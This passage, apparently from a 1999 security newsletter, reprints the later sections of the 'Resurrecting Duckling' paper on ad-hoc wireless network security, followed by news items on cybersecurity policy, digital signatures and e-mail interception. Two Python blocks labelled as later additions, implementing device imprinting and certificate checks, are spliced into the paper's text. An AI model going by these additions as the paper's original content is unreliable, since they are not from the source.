imprinting. No cryptography is involved, since the secret is transmitted in plaintext, and there is no ambiguity about which two entities are involved in the binding.
Note that an imprinted duckling may still interact with principals other than its mother; it just cannot be controlled by them. In our medical application, we would usually want the thermometer to report the patient's temperature to any device in the ward which asked for it. Only in exceptional circumstances (such as a celebrity patient, or a patient with a socially stigmatised condition) would the patient require encrypted communications to a single doctor's PDA. So should we also have an option of imprinting the device with a cleartext access control list (and perhaps the patient's name), rather than an ignition key? This brings us back to the issue raised at the end of section *, namely how we might enable a single device to support security mechanisms of differing strength. The solution that we favour is to always bootstrap by establishing a shared secret and to use strong cryptography to download more specific policies into the node. The mother can always send the duckling an access control list or whatever in a message protected by the shared secret. Having a key in place means that the mother can change its mind later; so if the patient is diagnosed HIV positive and requests secure handling of his data from then on, the doctor does not have to kill and reinitialise all the equipment at his bedside. In general, it appears sound policy to delegate from a position of strength.

Integrity

So far we have seen that denial of service, the goals of authentication, and the mechanisms for identifying other principals are surprisingly different in an ad-hoc network. Is there any role for the more conventional computer security mechanisms? The answer appears to be a qualified yes when we look at integrity. Integrity means ensuring that the node has not been maliciously altered.
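The lifecycle described from the resurrecting duckling policy through imprinting above (imprinting by plaintext contact with the first key winning, death by the mother's command, by timeout or on return to the disinfectant bowl, escrowed seppuku under a manufacturer master key, the two souls with calibration state that user-level death does not erase, and a finer policy such as an access control list downloaded under the ignition key), as one added example that is not code from the original paper. The command format, HMAC-SHA256 as the MAC, the sequence-number check against over-the-air replay, the nonce-bound seppuku order and the bowl hook are all assumptions made for this illustration.

```python
# Added example (not from the paper): the resurrecting-duckling policy as a
# state machine.  Command format, MAC choice and replay check are assumptions.
import hashlib
import hmac
import secrets


def mother_tag(key: bytes, seq: int, body: str) -> bytes:
    """MAC the mother (e.g. the doctor's palmtop) attaches to a command."""
    return hmac.new(key, f"{seq}|{body}".encode(), hashlib.sha256).digest()


def shogun_order(escrow_key: bytes, nonce: bytes) -> bytes:
    """The manufacturer's escrowed seppuku order, bound to a fresh nonce."""
    return hmac.new(escrow_key, b"seppuku|" + nonce, hashlib.sha256).digest()


class Duckling:
    def __init__(self, escrow_key: bytes, max_age: float = None):
        self.escrow_key = escrow_key    # held by the manufacturer (the Shogun)
        self.max_age = max_age          # None: never dies of old age
        self.calibration = 0.0          # calibration soul: survives user death
        self._pre_birth_state()

    def _pre_birth_state(self) -> None:
        """Death: the user soul dissolves and the body is imprintable again."""
        self.key, self.acl, self.born_at, self.last_seq, self._nonce = None, None, None, 0, None

    @property
    def imprintable(self) -> bool:
        return self.key is None

    def imprint_by_contact(self, key: bytes, now: float) -> bool:
        """Plaintext secret over an electrical contact; the first key wins."""
        if not self.imprintable:
            return False
        self.key, self.born_at, self.acl = key, now, {"*"}   # default: open
        return True

    def _old_age(self, now: float) -> None:
        if self.key is not None and self.max_age is not None and now - self.born_at > self.max_age:
            self._pre_birth_state()

    def command(self, seq: int, body: str, tag: bytes, now: float) -> str:
        """Command under MAC(ignition key, seq|body); a non-increasing seq is a replay."""
        self._old_age(now)
        if self.imprintable:
            return "refused: not imprinted"
        if not hmac.compare_digest(mother_tag(self.key, seq, body), tag):
            return "refused: bad MAC"
        if seq <= self.last_seq:
            return "refused: replay"
        self.last_seq = seq
        if body.startswith("acl="):        # finer policy, downloaded under the key
            self.acl = set(filter(None, body[4:].split(",")))
            return "ok: acl updated"
        if body == "die":                  # only the mother may kill it
            self._pre_birth_state()
            return "ok: dead"
        return "refused: unknown command"

    def challenge(self) -> bytes:
        self._nonce = secrets.token_bytes(16)
        return self._nonce

    def escrowed_seppuku(self, tag: bytes) -> bool:
        """Recovery when the mother is lost: the Shogun's master key orders suicide."""
        if self._nonce is None or not hmac.compare_digest(shogun_order(self.escrow_key, self._nonce), tag):
            return False
        self._pre_birth_state()
        return True

    def return_to_bowl(self) -> None:
        self._pre_birth_state()            # death designed to follow a transaction

    def calibrate_by_station(self, offset: float) -> None:
        """Only the station writes the high-integrity soul; no mother command can."""
        self.calibration = offset

    def read(self, raw: float, requester: str, now: float):
        """Report to anyone on the ACL ('*' means the whole ward), else nothing."""
        self._old_age(now)
        if self.imprintable or not ("*" in self.acl or requester in self.acl):
            return None
        return raw + self.calibration


def hospital_scenario() -> dict:
    """Constructed walk-through of one life of the thermometer."""
    d = Duckling(escrow_key=b"manufacturer-master-key")
    d.calibrate_by_station(-0.5)
    k_doc, k_intruder = secrets.token_bytes(16), secrets.token_bytes(16)
    out = {"imprint": d.imprint_by_contact(k_doc, now=0.0)}
    out["second_imprint"] = d.imprint_by_contact(k_intruder, now=1.0)  # egg already fertilised
    out["open_reading"] = d.read(37.5, "nurse-station-3", now=2.0)
    body = "acl=doctor-pda"                                # celebrity patient: restrict
    out["restrict"] = d.command(1, body, mother_tag(k_doc, 1, body), now=3.0)
    out["nurse_after"], out["doctor_after"] = d.read(37.5, "nurse-station-3", 4.0), d.read(37.5, "doctor-pda", 4.0)
    out["replay"] = d.command(1, body, mother_tag(k_doc, 1, body), now=5.0)
    out["forged_die"] = d.command(2, "die", mother_tag(k_intruder, 2, "die"), now=6.0)
    d.return_to_bowl()
    out["imprintable_again"], out["calibration_kept"] = d.imprintable, d.calibration
    return out
```

Note what the ignition key buys: the same thermometer starts life reporting to the whole ward and is later restricted to one PDA without being killed and re-imprinted, exactly the "delegate from a position of strength" point, and an intruder holding a different key can neither kill it nor change its policy.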
The recipient wants to be sure that the measurements come from the genuine thermometer and not from a node that has been modified to send out incorrect temperature values (maybe so as to disrupt the operation of the recipient's nuclear power plant).

If you can't afford signatures...

Prudence dictates that a patient's temperature should only be measured by a "known good" thermometer, such as one that passed a calibration inspection within the last six months. So it is natural for calibrators to issue signed dated certificates (though some care must be taken if some of the thermometer's prospective clients do not possess a clock). But the certificate could have been replayed by a middleman. What sort of mechanisms should be implemented to prevent this? If the thermometer can perform digital signatures and the palmtop can check them, the solution is straightforward: the thermometer's calibration certificate can include the node's public key. Where the thermometer cannot perform public key cryptography, the palmtop will establish a common secret with the thermometer using the techniques of section * and, having verified its certificate, will be able to accept messages protected by a MAC keyed with the shared secret. At this point, we depart once more from the conventional wisdom of the computer security community. The obvious objection is that, since neither certificates nor IDs are secret, a false device might be constructed which clones a genuine one; and that the only proper way to use a certificate is to certify a public key whose private key is known only to the device. However, this is tied up closely with the issues of tamper proofness and tamper evidentness. If our devices are not tamper-proof, then the private key can be read out and installed in a bogus device; but if they meet the much weaker requirement of tamper-evidentness (say with sealed enclosures), a forger will not be able to produce an intact seal on the bogus device.
So we will have confidence in a certificate which we receive protected under an ignition key that we shared successfully with a device whose seal was intact. (This is the first example we know of a purely "bearer" certificate: it need not contain a name or even a pseudonym.) We will now discuss this in more detail.

Tamper resistance

The doctor's reliance on the "genuine thermometer" certificate assumed that, after the thermometer was last inspected, calibrated and certified, it stayed that way. This assumption may be questioned in many applications, especially as in Piconet not all nodes are well guarded, highly personal accessories such as Java rings [java-ring-www] over which the owner is expected to keep close and continuous control. On the contrary, many nodes (such as broadcasting sensors) may be commodities that are scattered around and left to their fate. With such a model an attacker may, and sooner or later will, modify or forge a deployed node, possibly redeploying the corrupted node in an unsuspecting environment. This can in theory be avoided by making the node tamper-proof, but it is much easier to talk about this property than to implement it in practice [tamper-resistance], especially within the cost and form factor constraints of personal consumer electronics devices. Under the circumstances, it is not clear how much extra assurance is given by furnishing our thermometer with the ability to do public key cryptography; such a device can have its private key read out just as a device with a certificate but without a private/public keypair can be forged. In such environments it may often be more suitable to use physical tamper-evidence mechanisms (such as seals) rather than electronic mechanisms (such as tamper sensing switches that zeroise memory).
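The "if you can't afford signatures" scheme above, as an added example that is not code from the original paper: the calibrator issues a signed, dated bearer certificate that names no device; the thermometer, which cannot sign, returns the certificate and its reading under a MAC keyed with the secret shared by contact; the palmtop, which has a clock and the calibrator's public key, checks the signature, the expiry date and the MAC, and a fresh nonce per query defeats the middleman's replay. So that the block runs with only the standard library, the calibrator signs with a Lamport one-time signature (hash-based, one key per certificate) rather than a conventional scheme; the certificate layout, the message format, the nonce length and the ISO date strings are assumptions.

```python
# Added example (not from the paper).  Lamport one-time signatures stand in
# for the calibrator's signature; certificate and message formats are assumed.
import hashlib
import hmac
import json
import secrets


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def lamport_keygen():
    """256 pairs of random secrets; the public key is their hashes.
    A Lamport key must sign exactly one message: one key per certificate."""
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(256)]
    return sk, [(H(a), H(b)) for a, b in sk]


def _bits(msg: bytes):
    d = H(msg)
    return [(d[i >> 3] >> (7 - (i & 7))) & 1 for i in range(256)]


def lamport_sign(sk, msg: bytes) -> list:
    return [sk[i][b] for i, b in enumerate(_bits(msg))]


def lamport_verify(pk, msg: bytes, sig: list) -> bool:
    return len(sig) == 256 and all(H(sig[i]) == pk[i][b] for i, b in enumerate(_bits(msg)))


def issue_certificate(calib_sk, calibrated_on: str, expires: str) -> dict:
    """A bearer certificate: no device name, only the calibration facts.
    That the bearer is genuine is vouched for by its intact seal, not by a name."""
    body = json.dumps({"calibrated_on": calibrated_on, "expires": expires}, sort_keys=True).encode()
    return {"body": body, "sig": lamport_sign(calib_sk, body)}


def reading_mac(shared: bytes, nonce: bytes, cert_body: bytes, reading: bytes) -> bytes:
    return hmac.new(shared, b"|".join([nonce, cert_body, reading]), hashlib.sha256).digest()


class Thermometer:
    """Cannot sign; it only MACs under the secret shared by physical contact."""
    def __init__(self, cert: dict, shared: bytes, sensor: float):
        self.cert, self.shared, self.sensor = cert, shared, sensor

    def respond(self, nonce: bytes) -> dict:
        reading = f"{self.sensor:.2f}".encode()
        return {"cert": self.cert, "reading": reading,
                "tag": reading_mac(self.shared, nonce, self.cert["body"], reading)}


class Palmtop:
    """Has a clock and the calibrators' public keys: checks signature, date, MAC."""
    def __init__(self, calib_pks: list, shared: bytes, today: str):
        self.calib_pks, self.shared, self.today = calib_pks, shared, today

    def verify(self, nonce: bytes, resp: dict):
        cert = resp["cert"]
        if not any(lamport_verify(pk, cert["body"], cert["sig"]) for pk in self.calib_pks):
            return None, "bad calibration signature"
        if json.loads(cert["body"])["expires"] < self.today:     # ISO dates sort as text
            return None, "calibration expired"
        if not hmac.compare_digest(reading_mac(self.shared, nonce, cert["body"], resp["reading"]),
                                   resp["tag"]):
            return None, "bad MAC (replay or wrong device)"
        return float(resp["reading"].decode()), "ok"

    def query(self, thermometer: Thermometer):
        """Fresh nonce per query, so a recorded answer cannot be replayed."""
        nonce = secrets.token_bytes(16)
        return nonce, thermometer.respond(nonce)


def scenario() -> dict:
    """Constructed run: valid query, expired certificate, forged certificate, replay."""
    sk1, pk1 = lamport_keygen()
    sk2, pk2 = lamport_keygen()
    shared = secrets.token_bytes(16)                   # from the contact imprint
    palm = Palmtop([pk1, pk2], shared, today="1999-10-24")
    good = Thermometer(issue_certificate(sk1, "1999-05-01", "1999-11-01"), shared, 37.4)
    stale = Thermometer(issue_certificate(sk2, "1998-10-01", "1999-04-01"), shared, 37.4)
    forged_cert = dict(good.cert, body=good.cert["body"].replace(b"1999-11-01", b"2009-11-01"))
    forged = Thermometer(forged_cert, shared, 37.4)
    out = {}
    nonce, resp = palm.query(good)
    out["valid"] = palm.verify(nonce, resp)
    out["expired"] = palm.verify(*palm.query(stale))
    out["forged"] = palm.verify(*palm.query(forged))
    out["replay"] = palm.verify(secrets.token_bytes(16), resp)   # old answer, new nonce
    return out
```

The expiry check lives on the palmtop, the one party with a clock, which is the paper's caveat about clients without one; and a device that merely copied the certificate would still fail the MAC unless it had also been imprinted with the same shared secret, which is why the certificate alone does not have to be secret.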
In this case, one must still design the device so that non-intrusive attacks (such as those based on protocol failure, power analysis and glitch attacks [cheap-tamper]) are not practical; it is also necessary to take into account the time that might pass before a broken seal is noticed, and the likelihood of successful attacks on the sealing mechanism [johnston-seals]. It must also be realised that the tampering may not be limited to the onboard code and keys: a very effective attack on the unattended thermometer is to simply replace its analogue sensing element with a bad one. This attack highlights that even enclosing the entire processor, memory and backup battery in a high-grade tamper resistant enclosure, with only a ribbon connector to interface with the outside world, would still leave us vulnerable to direct attacks on its "peripherals". Bringing the sensor itself within the tamper resistant enclosure may make manufacturing too expensive (the computing and communication core will no longer be a modular building block) and may even interfere with the proper working of the sensor. So the transducer may be an Achilles' heel, and it may not be worth spending large sums on tamper-proofing the core if the sensor cannot economically be protected. When making decisions about what level of tamper-proofness or tamper-evidentness a system needs, it is as well to bear in mind that corrupt nodes can be used in a number of ways. Attacks might be immediate and direct, or alternatively the attacker might field a number of nodes which would accept software upgrades from him as well as from the authorised source.

Software upload

For nodes to be useful, there has to be a way to upload software into them, if nothing else during manufacture; in many applications we will also want to do this after deployment.
So we will want to prevent opponents from exploiting the upload mechanism, whatever it is, to infiltrate malicious code, and we will want to be able to detect whether a given node is running genuine software or not. Neither of these goals can be met without assuming that at least some core bootstrap portion of the node escapes tampering. The validity of such an assumption will depend on the circumstances; the expected motivation and ability of the attackers, and the effort spent not just on protecting the node with tamper-resistance mechanisms and seals, but in inspection, audit and other system controls.

Confidentiality

We find that we have little to say about confidentiality other than remarking that it is pointless to attempt to protect the secrecy of a communication without first ensuring that one is talking to the right principal. Authenticity is where the real issues are and, once these are solved, protecting confidentiality is simply a matter of encrypting the session using whatever key material is available. In the event that covert or jam-resistant communications are required, then the key material can be used to initialise spread-spectrum or frequency-hopping communication. Note that, in the absence of shared key material and an accurate time source, such techniques are problematic during the important initial resource discovery phase in which devices try to determine which other nodes are nearby.

Conclusions

We examined the main security issues that arise in an ad-hoc wireless network of mobile devices. The design space of this environment is constrained by tight bounds on power budget and CPU cycles, and by the intermittent nature of communication. This combination makes much of the conventional wisdom about authentication, naming and service denial irrelevant; even tamper resistance is not completely straightforward.
There are interesting new attacks, such as the sleep deprivation torture, and limitations on the acceptable primitives for cryptographic protocols. However, there are also new opportunities opened up by the model of secure transient association, which we believe may become increasingly important in real networking applications. The contribution of this paper was to spell out the new problems and opportunities, and to offer a new way of thinking about the solution space: the resurrecting duckling security policy model.

Acknowledgements

We thank Alan Jones for suggesting the wireless thermometer, a prototype of which had just been built in the context of Piconet, as a minimal but still meaningful practical example.

References

[tamper-resistance] Ross Anderson and Markus Kuhn. Tamper resistance - a cautionary note. In Proc. 2nd USENIX Workshop on Electronic Commerce, 1996.
[cheap-tamper] Ross Anderson and Markus Kuhn. Low cost attacks on tamper resistant devices. In Mark Lomas et al., editor, Security Protocols, 5th International Workshop Proceedings, volume 1361 of Lecture Notes in Computer Science, pages 125-136. Springer-Verlag, 1997.
[irda-www] Infrared Data Association. http://www.irda.org/.
[piconet97] Frazer Bennett, David Clarke, Joseph B. Evans, Andy Hopper, Alan Jones, and David Leask. Piconet: Embedded mobile networking. IEEE Personal Communications, 4(5):8-15, October 1997.
[Biba1975] Kenneth J. Biba. Integrity considerations for secure computer systems. Technical Report MTR-3153, MITRE Corporation, April 1975.
[homerf-www] HomeRF Working Group. http://www.homerf.org/.
[bluetooth98] Jaap Haartsen, Mahmoud Naghshineh, Jon Inouye, Olaf J. Joeressen, and Warren Allen. Bluetooth: Visions, goals, and architecture. ACM Mobile Computing and Communications Review, 2(4):38-45, October 1998.
[firewire] IEEE. IEEE standard for a high performance serial bus. IEEE Standard 1394, 1995.
[johnston-seals] Roger G. Johnston and Anthony R.E. Garcia.
Vulnerability assessment of security seals. Journal of Security Administration, 20(1):15-27, June 1997.
[Lorenz] Konrad Lorenz. Er redete mit dem Vieh, den Vögeln und den Fischen (King Solomon's ring). Borotha-Schoeler, Wien, 1949.
[java-ring-www] Sun Microsystems. http://java.sun.com/features/1998/03/rings.html.
[homerf98] Kevin J. Negus, John Waters, Jean Tourrilhes, Chris Romans, Jim Lansford, and Stephen Hui. HomeRF and SWAP: Wireless networking for the connected home. ACM Mobile Computing and Communications Review, 2(4):28-37, October 1998.
[bluetooth-www] Bluetooth SIG. http://www.bluetooth.com/.

http://www.cl.cam.ac.uk/~fms27/duckling/ (frank.stajano@cl.cam.ac.uk)
Last modified: May 20 1999

@HWA

83.0 GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 11:05 pm CET

Federal agencies, which have begun spending millions to upgrade information security in response to a presidential directive, say protecting computer networks will also mean finding ways to hold software vendors accountable for the quality of their products. John Gilligan, CIO of the U.S. Department of Energy, said users have to "focus our attention" on better defining the expectations and enforcement of warranties for commercial software. Vendors must "provide products that will either be free from certain types of vulnerabilities or reliability problems or they will have financial liability".

Computerworld. (Online News, 10/19/99 04:54 PM)

Gov't IT execs seek 'software accountability'
By Patrick Thibodeau

ARLINGTON, Va. -- Federal agencies, which have begun spending millions to upgrade information security in response to a presidential directive, say protecting computer networks will also mean finding ways to hold software vendors accountable for the quality of their products. John Gilligan, CIO of the U.S.
Department of Energy, said users have to "focus our attention" on better defining the expectations and enforcement of warranties for commercial software. Vendors must "provide products that will either be free from certain types of vulnerabilities or reliability problems or they will have financial liability," said Gilligan, speaking today at the U.S. Department of Commerce's National Information Systems Security Conference. Federal agencies were ordered by President Clinton last year to do what's necessary to protect critical systems from information security threats. The order set off a scramble among agencies to develop security plans and seek money from Congress. But some issues aren't easily addressed. U.S. agencies are becoming "increasingly more reliant on commercial off-the-shelf products" said Christopher Mellon, deputy assistant secretary of defense for security and information operations. And it's difficult to tell, in some cases, where commercial software code "was written, what its heritage is and to even know what it is you are buying," he said. Defense and other federal agencies are working on plans to improve information security through training, vulnerability testing and system improvements that include developing incident-response teams to tackle security threats. Agencies are also improving training for system-administration workers. But Congress is balking on funding. The Commerce Department is seeking some $79 million for its information-security work; and the Department of Energy, which was plagued by an espionage scandal, asked for some $35 million this year, which it has not yet received. Federal officials say security funding is cost effective. One security incident can cost as much as $500,000 to repair. As with private industry, the information security threats posed by disgruntled employees are greater for government systems than attacks from outside. But an exception to that rule is the National Aeronautics and Space Administration.
According to David Nelson, the deputy CIO at NASA, most of its system attacks and intrusions come from outside the agency. Nelson said he's puzzled by it. About the only thing that can explain it, Nelson concluded, "is NASA is a pretty good place to work."

@HWA

84.0 DEFAULT #7 OUT
     ~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Wednesday 20th October 1999 on 11:05 pm CET

Default issue seven was released. Again you could read some interesting topics: 5 reasons why your Mac is safer than Wintel, Setting up a great desktop Linux, How to make safe Windows 95 based server, Apple Power Mac G4, Web based encrypted e-mail (critique and the response), More from the ACPO front, Welcome to the wonderful world of cellular phreaking, Unix logging and auditing tools. Default and default webboard.

http://default.net-security.org
http://www.net-security.org/webboard.html

@HWA

85.0 UK POLICE GETTING THE POWER TO TAP E-MAIL?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 1:45 am CET

UK computer users who refuse to divulge their passwords to the authorities face up to two years in jail under increased police powers to be unveiled in next month's Queen's speech. Other measures drawn up by the government will make it easier for companies to monitor employees' phone calls and e-mails. A third part of the crackdown will give the police new authority to tap mobile phone calls, pager messages and e-mail.

The Sunday Times. http://www.sunday-times.co.uk/news/pages/sti/99/10/17/stinwenws01031.html?999

October 17 1999 BRITAIN

Police to get power to tap e-mail
Michael Prescott, Political Editor

COMPUTER users who refuse to divulge their passwords to the authorities face up to two years in jail under increased police powers to be unveiled in next month's Queen's speech. Other measures drawn up by the government will make it easier for companies to monitor employees' phone calls and e-mails.
A third part of the crackdown will give the police new authority to tap mobile phone calls, pager messages and e-mail. The plans were already attracting criticism last night, with one Tory MP warning that the government risked creating "a state surveillance system like something out of Orwell's 1984". Government ministers will justify the measures as necessary to trap pornographers, drug traffickers and fraudsters who exploit new technology. Police officers who gain a search warrant from the courts can already look at computer files, but provisions in the forthcoming e-commerce bill will allow them to demand passwords used to protect sensitive data. A suspect who withholds them faces a jail term of up to two years. "Paedophiles and drug barons tend to send material that can be unlocked only if you know a code often extending to many digits," said a senior government source last night. "The law has to catch up with this." The bill will also legally oblige internet service providers (ISPs) to keep records showing to and from whom material has been sent and received. In spite of industry complaints about the cost, ministers want the ISPs to keep detailed records on all customers for days at a time. "The provision will prove invaluable in tracking down paedophile rings, for example," said a source at the Department of Trade and Industry, which has drawn up the measure in co-operation with the Home Office. Many companies monitor employees' phone calls and e-mails to ensure customers and clients are being dealt with according to required standards. This is a grey area legally, but the Home Office is to give firms a legal right to monitor their workers, so long as they warn them that this is company practice. The proposed new Interception of Communication Act will also deal with criminals who frequently change their mobile phone numbers and e-mail addresses, to exploit the fact that warrants are issued for a particular number or address.
New catch-all warrants will cover all of a named individual's communications devices and will last for three months instead of two.

@HWA

86.0 WASHINGTON DIVIDED ON NET SIGNATURES BILL
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 1:25 am CET

Continuing confusion over just what version of digital signature legislation will be considered on the floor of the House of Representatives has caused House leadership to pull consideration of the bill until next week. Aides to House Majority Leader Richard Armey did not return telephone calls seeking comments, but a reliable congressional source told Newsbytes that the House Judiciary and Commerce Committees still need to work out some kind of compromise on their different versions of the bill before it goes through the Rules Committee and eventually to the House floor.

http://www.newsbytes.com/pubNews/99/138045.html

House Won't Vote On Net Signatures Today
By Robert MacMillan, Newsbytes

WASHINGTON, DC, U.S.A., 19 Oct 1999, 3:57 PM CST

Continuing confusion over just what version of digital signature legislation will be considered on the floor of the House of Representatives has caused House leadership to pull consideration of the bill until next week. Aides to House Majority Leader Richard Armey, R-Texas, did not return telephone calls seeking comments, but a reliable congressional source told Newsbytes that the House Judiciary and Commerce Committees still need to work out some kind of compromise on their different versions of the bill before it goes through the Rules Committee and eventually to the House floor. A source in the Commerce Committee said that the committee still is optimistic about working out a version of the legislation that suits their interests, despite the fact that the Judiciary Committee made substantial changes to their version of the bill.
It now is up to Rules Committee Chairman David Dreier, R-Calif., and his colleagues either to help forge compromise legislation between the two committees, to choose one version of the bill to send to the floor for a vote, or even to send both versions for consideration. The bill, H.R. 1714, known as the E-SIGN Act, had been scheduled for a quick suspension vote in the House today, but House sources confirmed that the bill had been pulled this morning. The purpose of the legislation is to provide a national framework that legalizes the use of digital signatures, but many Democratic members were concerned that it unfairly preempts states from enforcing their own laws. Republicans on the Judiciary Committee argued that the Democratic alternative wipes out the purpose for the legislation, which is to develop a national legal standard to make digital signatures legally binding.

Reported by Newsbytes.com, http://www.newsbytes.com . 15:57 CST Reposted 17:34 CST

@HWA

87.0 FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 1:10 am CET

Despite mounting pressure from Congress to make tangible progress on the governmentwide effort to protect critical federal information systems from hackers and other criminals, agencies continue to struggle with funding, personnel and training roadblocks, officials said today. Under Presidential Decision Directive 63, signed in May 1998, all federal agencies are required to develop plans and take steps to protect their critical infrastructure. Agency CIOs, however, are having serious problems finding the resources to actually follow this through.

Federal Computer Week. http://www.fcw.com/pubs/fcw/1999/1018/web-pdd-10-19-99.html

OCTOBER 19, 1999 . . . 14:31 EDT

Feds having trouble finding money, people for cybersecurity
BY DIANE FRANK (dfrank@fcw.com)

CRYSTAL CITY, Va.
-- Despite mounting pressure from Congress to make tangible progress on the governmentwide effort to protect critical federal information systems from hackers and other criminals, agencies continue to struggle with funding, personnel and training roadblocks, officials said today. Under Presidential Decision Directive 63, signed in May 1998, all federal agencies are required to develop plans and take steps to protect their critical infrastructure. Agency chief information officers have been charged with leading the protection of information systems under PDD 63 and are receiving pressure from administrators, Congress and auditors to install protective measures as soon as possible. Agency CIOs, however, said they are having trouble finding the resources to follow through. "It requires a lot of dollars to do PDD 63," said Roger Baker, CIO at the Commerce Department, during a panel session at the National Information Systems Security conference here. Making matters worse, the Office of Management and Budget has told Commerce to find the money it needs for cybersecurity within current budgets, not from new appropriations, Baker said. Other agencies are experiencing similar problems, including the Energy Department, which, despite several high-profile security breaches, recently lost its battle with Congress to get $35 million added to its fiscal 2000 budget for cybersecurity, said John Gilligan, CIO at DOE. Although lack of personnel is another well-known problem, most agencies are finding out that the real issue is training and awareness for current employees. NASA, for example, recently worked with the Defense Information Systems Agency to develop a new multimedia training CD-ROM that all NASA personnel are required to use. However, managers and system administrators require a different level of training, and the agency is putting together a pilot certification program at the John H. Glenn Research Center in Ohio. 
"System administrators are a critical point for us, and we are not yet happy about our training for our system administrators," said David Nelson, acting deputy CIO at NASA. Like many agencies, the Defense Department also is working with other agencies and with industry to find commercial products that meet the agency's security needs. "We need to work together and communicate [and] collaborate more closely than ever before in order to be effective," said Christopher Mellon, deputy assistant secretary of Defense for security and information operations. One solution DOD is considering is issuing a directive that Defense agencies must use products validated by the National Information Assurance Partnership, he said. The NIAP is a joint effort by the National Security Agency and the National Institute of Standards and Technology to certify that commercial products meet security standards. @HWA 88.0 CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 0:45 am CET Yesterday California officially authorized Verisign Inc. to begin issuing digital signature certificates to secure communications between state agencies and between the state and its citizens, ushering in a new era of electronic services delivery. Bill Jones, California's secretary of state, marked the occasion by digitally "signing" the authorization certificate for the company, making it the first such transaction since the state passed a law that spelled out the requirements for legally binding digital signatures. CNN. California inaugurates digital signatures October 19, 1999 Web posted at: 9:40 a.m. EDT (1340 GMT) by Dan Caterinicchia (IDG) -- Yesterday California officially authorized Verisign Inc. to begin issuing digital signature certificates to secure communications between state agencies and between the state and its citizens, ushering in a new era of electronic services delivery. 
Bill Jones, California's secretary of state, marked the occasion by digitally "signing" the authorization certificate for the company, making it the first such transaction since the state passed a law that spelled out the requirements for legally binding digital signatures.

"We're bringing in the private sector to help us to create the opportunity for the public to access [government] services more quickly," Jones said. "Our goal is to deliver something that's easily accessible but doesn't add to the layers of government."

Digital signatures are seen as a vital component of Internet-based commerce because they authenticate the identities of the parties involved in a transaction. Verisign, based in Mountain View, Calif., was the first to satisfy California's digital signature requirements.

Jones said his department is interested in using digital signatures to enable residents to cast votes over the Internet. Other agencies have expressed a desire to use the tool to secure business filings and similar transactions, he said.

Stratton Sclavos, Verisign's president and chief executive officer, said that for all the Internet has done to change the commerce landscape domestically and abroad, so far it has missed the "citizen-government relationship." He added that digital signature certification and the host of services it affects will exact a "fundamental change in the way citizens are going to interact with [state and local] government."

Verisign is working on similar digital signature projects in Oregon, New Jersey, Utah and Washington, Sclavos said.

@HWA

89.0 AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Wednesday 20th October 1999 on 0:05 am CET

On Monday, Amazon launched a two-week contest asking users to decipher the hidden meaning behind five lines of seemingly random numbers. The prize: a package of crypto books and a programmable robot kit.
Hours after its launch, news of the contest hit the Internet code-cracking community in a big way. And in a few more hours, cryptographers were already talking about how they solved the puzzle.

Wired.

Code Crunchers Crack Contest
by Joanna Glasner

1:35 p.m. 19.Oct.99.PDT

A cure for the common code was reportedly found by a bunch of cryptographers this week.

On Monday, Amazon launched a two-week contest asking users to decipher the hidden meaning behind five lines of seemingly random numbers. The prize: a package of crypto books and a programmable robot kit. The entrants: Just about anyone, really. No math degree needed, Amazon pledged. Heck, the online retailer even promised to throw in a couple of hints along the way to help out the less code-adept.

As it turned out, it wasn't necessary. Hours after its launch, news of the contest hit the Internet code-cracking community in a big way. And in a few more hours, cryptographers were already talking about how they solved the puzzle.

The hoopla began around 7 p.m. EDT on Monday, when Bradley Beth, a computer programmer from Richardson, Texas, sent an email posting about the contest to nerd-centric news and gossip site Slashdot.org. Within minutes, dozens of code-crunchers set to work on the puzzle, posting their theories along the way.

Software developer Rob Montaro pitched in with what others took as a key insight: that some of the seemingly random numerals posted on Amazon's site actually matched up with the numbers used to reference books, known in publishing circles as ISBN numbers.

Once that clue hit the wires, the rest was pretty easy, said Boston software engineer Seth Finkelstein. He spent a few minutes writing a PERL script to analyze the code and develop a few solutions based on Montaro's insight. In a couple of hours, he came up with a somewhat strangely worded but reasonably coherent solution that he eventually posted online. It was one of several such postings.
Finkelstein shied away from taking credit for his feat. He said he's not certain the answer is entirely correct, adding it took no great skill to come up with a reasonable interpretation.

"It's not a serious contest," he said. "The sheer number of people who cracked it show it is not useful for hiding a message. You wouldn't want your financial records to be protected this way."

Amazon said the contest wasn't intended as a serious crypto test, but more as a kind of puzzle that might appeal to its code-crunching customers. Jennifer Buckendorff and Therese Littleton, the two Amazon site editors who designed the contest, saw it more as "a rainy afternoon treat for geeks" and a way to promote crypto-themed books.

The company didn't disclose how many contest entries it has received, or whether any were correct. The winner will be chosen through a random drawing of correct entries at the end of the month.

In the meantime, a few people thought the contest was being taken a bit too seriously. Or, in the words of one Slashdot poster: "This contest is supposed to be winnable by people who get stumped by crossword puzzles in USA Today, not by some paranoid lunatic that uses Ordo Novus Seclorum to read his email and encrypts his grocery list so that no one will find out he's buying stinky cheese and miniature vegetables."

@HWA

90.0 SANS: CYBERSECURITY RISKS REAL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Tuesday 19th October 1999 on 4:45 am CET

The SANS Institute held one of its briefings last week to help IT managers debunk several myths that senior managers hold about computer security. The briefing took participants on four virtual "field trips" to the sites of actual past cyberattacks to convince them the threat is real.

Computerworld.
